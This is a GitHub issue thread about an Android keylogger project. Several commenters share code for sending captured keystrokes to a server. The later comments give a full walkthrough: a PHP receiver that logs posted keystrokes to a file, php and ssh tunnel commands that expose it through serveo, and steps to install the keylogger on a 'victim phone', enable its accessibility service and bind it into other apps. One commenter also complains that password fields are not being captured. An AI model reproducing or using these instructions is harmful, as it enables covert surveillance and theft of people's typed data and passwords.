Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Timestamp #1

Open
12udy opened this issue Dec 13, 2017 · 12 comments
Open

Timestamp #1

12udy opened this issue Dec 13, 2017 · 12 comments

Comments

@12udy
Copy link

12udy commented Dec 13, 2017

@bshu2
Hi there,
Good job;
How did u set up the server page for that? Is it gcp?

@zonavip
Copy link

zonavip commented Jun 11, 2018

Lo que hice yo, fue cambiar la parte donde se hace el envio post al servidor, te copio el codigo aqui:

BasicNameValuePair textBasicNameValuePAir= new BasicNameValuePair("Text", params[0]);

List nameValuePairList = new ArrayList();
nameValuePairList.add(textBasicNameValuePAir);

UrlEncodedFormEntity urlEncodedFormEntity = new UrlEncodedFormEntity(nameValuePairList);
httpPost.setEntity(urlEncodedFormEntity);

y del lado de php o cualquier lenguaje te va llegar un POST en la variable "Text"

Saludos
Nahuel

@dedsec1911
Copy link

@zonavip
How did you manage to write the server sided code on PHP.
Can you elaborate ?

@zonavip
Copy link

zonavip commented Aug 9, 2018 via email

@dedsec1911
Copy link

@zonavip
But why should I download Outlook ?

@dedsec1911
Copy link

Okay, It took me a while but I have completed porting the server part from "Go" to "PHP".
If you want to take a look contact me !

@dedsec1911
Copy link

@zonavip Yes your code helped me a lot, but still there's a problem in getting the "password" field texts, maybe it's all to do with that "TEXT MASK".
Passwords inputs are shown as 'null' or '0' value !

@tux0n
Copy link

tux0n commented Oct 5, 2018

Hi can you post php code? I was trying to deploy go code on google appengine but it not work for me

@dedsec1911
Copy link

@mario8883 Yes I can but I need a little donation for that !

@zonavip
Copy link

zonavip commented Oct 5, 2018

Contact me

@dedsec1911
Copy link

dedsec1911 commented Oct 6, 2018

@zonavip Who me ?

@vanshsantoshi
Copy link

vanshsantoshi commented Oct 20, 2019

If you want to use this keylogger , and you don't have a website , you can use serveo to make a listener.
Change that

https://cs460-android-keylogger.appspot.com

link on Keylogger.java file with

https://anythingHere.serveo.net/keys.php

And compile it ,install it, enable accessibility option in settings for it

Then , here is that php file you requested
Well , it's not same as the developer made , but it'll throw every data to test.txt
file on the same directory

<?php	 		
     file_put_contents('test.txt', 
file_get_contents('php://input'),FILE_APPEND);   
?>   

And name it keys.php , and put it in on any directory

Then , run your own website for receiving data

php -S localhost:4444 -t /location/of/folder/where/is/the/keys.php/FileIsLocated

ssh -R anythingHere:443:localhost:4444 serveo.net

(You'll need php and openssh / autossh packages , install them using apt-get install )

Then , your https://anythinHere.serveo.net/keys.php link can be accessed through the internet !

Now , connect the victim phone to the internet ,install that keylogger , enable its accessibility service in settings it'll start keylogging every stuff ! (Personally tested , and it's damn good !)

My contact info:-
(Telegram :- "Retrocausality" , ever heard of it?
or @TermuxSucks)
(Mail:- [email protected])

@vanshsantoshi
Copy link

vanshsantoshi commented Oct 20, 2019

You can bind / embedded this keylogger on apps too , and it works great

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

5 participants